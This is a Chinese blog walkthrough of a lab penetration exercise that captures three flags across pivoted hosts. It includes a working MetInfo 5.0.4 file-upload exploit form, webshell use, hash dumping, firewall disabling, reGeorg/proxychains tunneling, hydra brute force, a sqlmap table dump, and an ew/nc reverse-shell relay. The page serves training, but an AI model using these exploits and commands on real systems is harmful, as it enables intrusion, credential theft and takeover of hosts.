关于多级级联V2

最新推荐文章于 2022-06-24 11:37:38 发布
最新推荐文章于 2022-06-24 11:37:38 发布
阅读量480 收藏
点赞数
分类专栏: 端口转发 渗透测试 文章标签: 多级级联 端口转发 Linux提权 sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45165528/article/details/103207173
版权

实验

文章目录

实验工具

VMware Workstation 15 Player
https://pan.baidu.com/s/17KNdgTOBStnfE0MEYPP6lQ提取码:0u6b

搭建环境

1.外网靶场 IP:192.168.100.130 NAT模式
2.调整物理机的网卡VMnet8的ipv4为192.168.100.1

实验要求

1.期间不允许使用虚拟机
2.在三个靶场中找出三个Flag

实验步骤

第一个Flag(文件上传漏洞)

打开网站之后发现是MetInfo v5.0.4版本的框架,知道相应版本的框架之后接下来的操作就是百度,看是否有出相应的漏洞。百度之后发现了有一出存在文件上传漏洞
漏洞位置:http://192.168.100.130/admin/include/uploadify.php
然后自己写一个html文件,代码如下

<meta charset="utf-8">
<form
    enctype="multipart/form-data"
    method="post"
    name="myfrom"
    action="http://192.168.100.130/admin/include/uploadify.php?tablepre=xx&met_lang=met_lang&lang=cn&met_admin_table=met_admin_table%20where%20usertype=3%23&metinfo_admin_id=1&metinfo_admin_pass=2&type=upfile&met_file_format=jpg|pphphp"
>
    <input name="Filedata" type="file" size=20>
    <input type="submit" name="Submit" value="提交信息">
</form>

将已经写好的一句话木马,上传到网站目录中。
在这里插入图片描述
知道上传路径之后,就可以通过菜刀连接了,输入地址,密码为666,成功连接菜刀之后,打开虚拟终端输入whoami查看当前用户的权限。
在这里插入图片描述
当前已经是系统权限,所以不需要提权,获取到getshell之后,我们就要进一步的对主机进行渗透。
将QuarksPwDump.exe上传至C盘根目录下,通过命令行打开获取密码的哈希值
在这里插入图片描述
通过MD5解密,解密出密码为:a1b2c3
接下来通过命令netstat -ano查看3389端口是否开启,准备远程连接。
在这里插入图片描述
3389端口是开启状态,但是当远程连接的时候还是连接不上,此时说明有两方面的原因。
①防火墙是开启状态
②系统禁止远程登录连接
我们可以尝试关闭防火墙,输入命令net stop sharedaccess,再次远程连接时已经可以连接了。
输入账号administrator密码a1b2c3成功连接到主机
在这里插入图片描述
第一个Flag已经找到

第二个Flag(代理 hydra密码爆破)

桌面上并没有什么有价值的信息,接下来可以查看以下IE浏览器的历史纪录,历史记录的位置为C:\Documents and Settings\Administrator\Local Settings\History,通过查看历史记录,发现了两个有价值的IP地址,一个是10.200.1.15另一个是10.200.1.16
浏览器历史记录中有一条记录为:ftp:10.200.1.15,点开之后登录需要密码,已知用户名为admin
在这里插入图片描述
目标:hydra进行密码爆破。
首先将tunnel.nosocket.php文件上传服务器中,在物理机中打开文件,查看是否可用。
在这里插入图片描述
然后将reGeorgSocksProxy.py上传至kali中,输入python reGeorgSocksProxy.py -u http://192.168.100.130/tunnel.nosocket.php运行文件
在这里插入图片描述
运行成功之后,设置代理,使用命令vi etc/proxychains.conf,打开文件之后,在文件的最底部,将socks4修改为socks5 127.0.0.1 8888并保存退出在这里插入图片描述
输入命令proxychains hydra -l admin -P pass.txt ftp://10.200.1.15进行密码爆破
在这里插入图片描述
成功爆破密码,返回外网主机进行ftp登录
第二个Flag就在ftp文件夹下面
在这里插入图片描述

第三个Flag(sql注入,端口转发,提权)

打开ftp之后发现了网站目录,可以下载下来进行代码审计,在代码审计的过程中,发现了一处可能存在SQL注入的地方。
地址:http://10.200.1.16/message.php?id=1
通过简单的验证之后发现他是联合查询注入,显示位是2,然后就可以使用sqlmap
输入命令proxychains sqlmap -u http://10.200.1.16/message.php?id=1 -D my_oa -T admin -C password,username --dump导出数据库中admin表中的用户及密码
在这里插入图片描述
找到登录密码之后直接登录OA系统
地址:http://10.200.1.16/admin/login.php
登录网站之后,发现一处存在任意文件上传漏洞,直接上传大马
地址:http://10.200.1.16/admin/userinfo.php
通过ftp找到文件上传的路径,在浏览器中打开。接下来进行反弹端口
接着,在物理机中使用nc.exe对5555端口进行监听,输入命令:nc.exe -lvvp 5555
在这里插入图片描述
然后将ew通过菜刀上传至外网主机中,然后进行端口转发,输入命令ew_for_Win.exe -s lcx_tran -l 4444 -f 192.168.100.1 -g 5555
在这里插入图片描述
然后打开大马,进行端口反弹
在这里插入图片描述
反弹成功,此时我的物理机已经进入到了IP为:10.200.1.16的命令行,通过whoami查看当前用户权限,需要提权
在这里插入图片描述
通过大马上传相应的exp
修改上传的exp的操作权限为777通过命令chomd 777 exp1
在这里插入图片描述
然后查看root目录下的文件找到第三个Flag
在这里插入图片描述

VVsec
关注
专栏目录
CascadingDropDown 多级级联操作的一种解决方案
ranweizheng的专栏
11-24 755
在开发过程中,特别是在做后台相关的查询列表时,我们常常遇到多级级联(2-3级)的情况,如通过学院-专业-班级级联查找学生信息。这时,在点击查询后,查询条件中的级联部分会丢失之前的条件。 以下提供了该问题的一种解决方案,可以作为大家的参考: 背景: 使用的级联js: /style/jquery/jquery.cascadingdropdown.js 可以使用jquery来完
级联rc滤波_六阶级联式开关电容低通滤波器设计与仿真分析
weixin_42386033的博客
01-17 1552
滤波技术是信号分析和处理中的重要分支,它的作用是从接收到的信号中提取有用的信息,抑制或消除无用的或有害的干扰信号,有助于提高信号完整度和系统稳定性。滤波器正是采用滤波技术的具有一定传输选择性的信号处理装置。随着现代集成电路技术和MOS工艺的飞速发展,模拟集成滤波器的实现已经成为现代工业的一个重大课题,也是当今国际上的前沿课题。传统的连续时间模拟滤波器采用有源RC结构,能够应用到较高的频率,但是电路...
Excel多级级联
09-13
Excel多级级联 利用Excel的数据有效性做出的一个Demo示例
JS多级联动
ChocooM
11-22 123
&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;JS联动下拉框&lt;/title&gt; &lt;meta name="GENERATOR" content="Microsoft Fro
多级级联菜单
Truly的专栏
07-31 2516
//////////////////////////////////////////////////////////// Data 实际应用时将把此段作为js脚本单独存放在.js文件中,由于blog过滤尖括号,特做了一些额外处理//一级数组var D0 = new Array(("河南","hn"),("河北","hb"),("浙江","zj"));//二
distpicker实现省市区多级级联
HookJony的专栏
02-01 3245
1.注意的问题 script type="text/javascript" src="../public/js/jquery-3.2.1.js">script> script type="text/javascript" src="../public/js/distpicker.js">script> Distpicker.js 的引用必须以Jquery为前提,所以必须在引入之前先引入Jque
VueJS Element UI自定义控件:Cascader级联下拉框,解决查看时树形数据回显
QC班长的博客
11-16 5531
下拉框在业务开发中还是很常用的,比如下拉菜单,上级组织机构选择,各种分类等等。在用到Element UI的Cascader 级联选择器下拉框组件时,不能满足我的需求,就在此基础上自定义了控件。 存在的问题: 1、Element UI官方的级联下拉控件el-cascader选择数据后,被选中的数据是数组形式的,例如:[7,6,1],但在数据库中保存时,一般只保存ID,不保存数组。所以就需要我们...
cascaded_mobilenet-v2
11-30
这种检测通常涉及多级检测,即先粗略定位,再逐步细化,从而提高检测精度,也就是所谓的级联结构。 **训练源码分析** 项目提供的`cascaded_mobilenet-v2-master`压缩包可能包含了以下组件: 1. **模型结构定义**...
V2+视频会议产品资料.docx
11-23
级联子系统可以在全球各地的多台服务器上分布,主从服务器级联的方式有效分散了网络处理压力,降低了用户设备的CPU占用,同时也支持用户量的进一步扩大。中心服务器则负责统一的登录管理、监控和升级,采用双机热备...
高可靠性技术白皮书.pdf
01-17
本文详细介绍了VRP所应用的可靠性技术 包括技术特点和给用户提供的解决方案
金仓KFS数据级联场景部署
arthemis_14的博客
06-24 520
KFS数据级联场景部署数据级联场景是源端数据发送给中间端数据库,再从中间端数据库发送到目标端数据库。KFS通过多个一对一的数据链路实现数据级联同步。一、环境信息1、软件版本KFS版本:Kingbase FlySync V001R006C003B20220107源端:oracle 11.2.0.4.0中间端:KingbaseES V008R006C003B0071目标端:Mysql 8.0.262、部署拓扑 KFS与数据库集中部署,部署在同一台服务器上。3、IP地址源端(oracle):192.168.100
2级、3级...多级联动
weixin_34356138的博客
02-02 691
/** * @念凝笙 * 三级联动 const Three new NNS_Select(DOM, 3, [...]) * 然后 Three.create()... */ class NNS_Select { /** * @params: * container: 容纳级联的容器 * num: 级联数目 * data: 数据 * 数据格式JSON...
Java-Excel(多级)级联下拉
konmor的博客
10-27 2909
完全使用java,使用Aspose.cells 插件,实现Excel级联下拉且不限制层数。 Aspose.cells 是第三方插件,并且它不依赖任何office相关内容,完全独立的一套穿java代码插件,可以实现晚间转换、创建、编辑等功能。
JS多级联动下拉列表(不限级数)
u011277123的博客
04-21 7268
微说微娱乐 2017-03-21 21:27 JS多级联动下拉列表,可用于省、市、区三级联动,或多级分类联动选择等。 不限级数,兼容浏览器,使用方法请看下面的HTML示例。 示例效果如下图所示: 部分源码:源码地址如下 http://blog.csdn.net/oukunqing/article/details/43406435
Excel的二级级联以及多级级联的实现
one_two
05-06 2356
Excel的二级级联多级级联的实现 实现步骤: 1.创建一个新的sheet页作为数据来源的sheet 2.以杭州市作为行政区为例,将对应的区街道写入到数据来源sheet中 3.选中需要校验的的列设置数据有效性 4.框选数据来源sheet中的目标数据作为数据来源 5.设置二级级联的数据 ①选中区县以及所有街道 ②开始 ->查找->定位 (可以取消选中区域的空值) ③公式 -&g...
Bootstrap多级级联菜单
热门推荐
lisa890608的专栏
01-22 2万+
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 5
级联选项
weixin_38722500的博客
07-27 270
&lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head lang="en"&gt; &lt;meta charset="UTF-8"&gt; &lt;title&gt;&lt;/title&gt; &lt;style&gt; * { padding: 0
QML 实现 多级级联框Cascader,封装为模块。
最新发布
06-02
可以通过使用 QML 中的 ListView 和 Delegate 实现多级级联框 Cascader,并将其封装为一个模块。具体步骤如下: 1. 创建一个新的 QML 文件,命名为 Cascader.qml,作为级联框组件的模块。 2. 在 Cascader.qml 中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值